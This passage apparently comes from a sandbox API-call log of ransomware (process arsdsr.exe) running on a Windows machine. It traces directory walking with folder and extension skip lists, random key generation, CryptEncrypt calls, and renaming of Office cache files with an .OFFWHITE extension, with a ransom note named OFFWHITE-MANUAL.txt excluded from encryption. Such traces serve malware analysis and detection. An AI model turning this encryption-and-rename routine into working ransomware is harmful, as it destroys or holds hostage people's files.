nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bb10*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0082.752] GetProcessHeap () returned 0x500000 [0082.752] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5aa) returned 0x546980 [0082.752] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.752] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x5aa, lpOverlapped=0x0) returned 1 [0082.752] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.752] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x5aa, lpOverlapped=0x0) returned 1 [0082.752] GetProcessHeap () returned 0x500000 [0082.752] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0082.752] CloseHandle (hObject=0x21c) returned 1 [0082.753] GetProcessHeap () returned 0x500000 [0082.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0082.753] GetProcessHeap () returned 0x500000 [0082.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0082.753] GetProcessHeap () returned 0x500000 [0082.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0082.753] GetProcessHeap () returned 0x500000 [0082.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0082.753] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0082.753] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.OFFWHITE" [0082.754] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.offwhite")) returned 1 [0082.754] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0082.754] lstrcmpiW (lpString1="PubLR.cab", lpString2=".") returned 1 [0082.754] lstrcmpiW (lpString1="PubLR.cab", lpString2="..") returned 1 [0082.754] lstrcmpiW (lpString1="PubLR.cab", lpString2="...") returned 1 [0082.754] lstrcmpiW (lpString1="PubLR.cab", lpString2="windows") returned -1 [0082.754] lstrcmpiW (lpString1="PubLR.cab", lpString2="$recycle.bin") returned 1 [0082.755] lstrcmpiW (lpString1="PubLR.cab", lpString2="rsa") returned -1 [0082.755] lstrcmpiW (lpString1="PubLR.cab", lpString2="ntuser.dat") returned 1 [0082.755] lstrcmpiW (lpString1="PubLR.cab", lpString2="programdata") returned 1 [0082.755] lstrcmpiW (lpString1="PubLR.cab", lpString2="appdata") returned 1 [0082.755] lstrcmpiW (lpString1="PubLR.cab", lpString2="program files") returned 1 [0082.755] lstrcmpiW (lpString1="PubLR.cab", lpString2="program files (x86)") returned 1 [0082.755] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0082.755] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="PubLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" [0082.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.755] PathFindExtensionW (pszPath="PubLR.cab") returned=".cab" [0082.755] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0082.755] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0082.755] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0082.755] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0082.755] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0082.756] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0082.756] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0082.756] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" [0082.756] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.756] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.756] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0082.756] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.756] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0082.756] GetProcessHeap () returned 0x500000 [0082.756] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb20 [0082.757] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0082.757] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1608) returned 1 [0082.757] GetProcessHeap () returned 0x500000 [0082.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0082.757] GetProcessHeap () returned 0x500000 [0082.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0082.757] GetProcessHeap () returned 0x500000 [0082.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0082.757] GetProcessHeap () returned 0x500000 [0082.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0082.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.757] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0082.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.757] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0082.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.758] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0082.758] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.758] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.758] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0082.758] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x648, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.758] SetLastError (dwErrCode=0x0) [0082.758] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.787] GetLastError () returned 0x0 [0082.787] GetLastError () returned 0x0 [0082.787] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x748, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.787] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.787] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x848, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.787] WriteFile (in: hFile=0x21c, lpBuffer=0x52bb20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bb20*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0082.787] GetProcessHeap () returned 0x500000 [0082.787] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x648) returned 0x546980 [0082.787] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.787] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x648, lpOverlapped=0x0) returned 1 [0082.787] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.787] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x648, lpOverlapped=0x0) returned 1 [0082.788] GetProcessHeap () returned 0x500000 [0082.788] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0082.788] CloseHandle (hObject=0x21c) returned 1 [0082.792] GetProcessHeap () returned 0x500000 [0082.792] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0082.792] GetProcessHeap () returned 0x500000 [0082.793] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0082.793] GetProcessHeap () returned 0x500000 [0082.793] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0082.793] GetProcessHeap () returned 0x500000 [0082.793] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0082.793] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" [0082.793] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0082.793] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0082.794] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0082.794] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0082.794] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0082.794] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0082.794] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0082.794] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-001A-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" [0082.794] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0082.794] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0082.794] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" [0082.794] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0083.649] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.649] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0083.649] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.649] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.649] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2=".") returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="..") returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="...") returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="windows") returned -1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="$recycle.bin") returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="rsa") returned -1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="ntuser.dat") returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="programdata") returned -1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="appdata") returned 1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="program files") returned -1 [0083.650] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="program files (x86)") returned -1 [0083.650] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0083.650] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="OutlkLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0083.650] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.650] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.650] PathFindExtensionW (pszPath="OutlkLR.cab") returned=".cab" [0083.650] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0083.651] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0083.651] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0083.651] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2=".") returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="..") returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="...") returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="windows") returned -1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="$recycle.bin") returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="rsa") returned -1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="ntuser.dat") returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="programdata") returned -1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="appdata") returned 1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="program files") returned -1 [0083.651] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="program files (x86)") returned -1 [0083.651] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0083.651] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="OutlookMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" [0083.652] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.652] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.652] PathFindExtensionW (pszPath="OutlookMUI.msi") returned=".msi" [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0083.652] lstrcmpiW (lpString1=".msi", 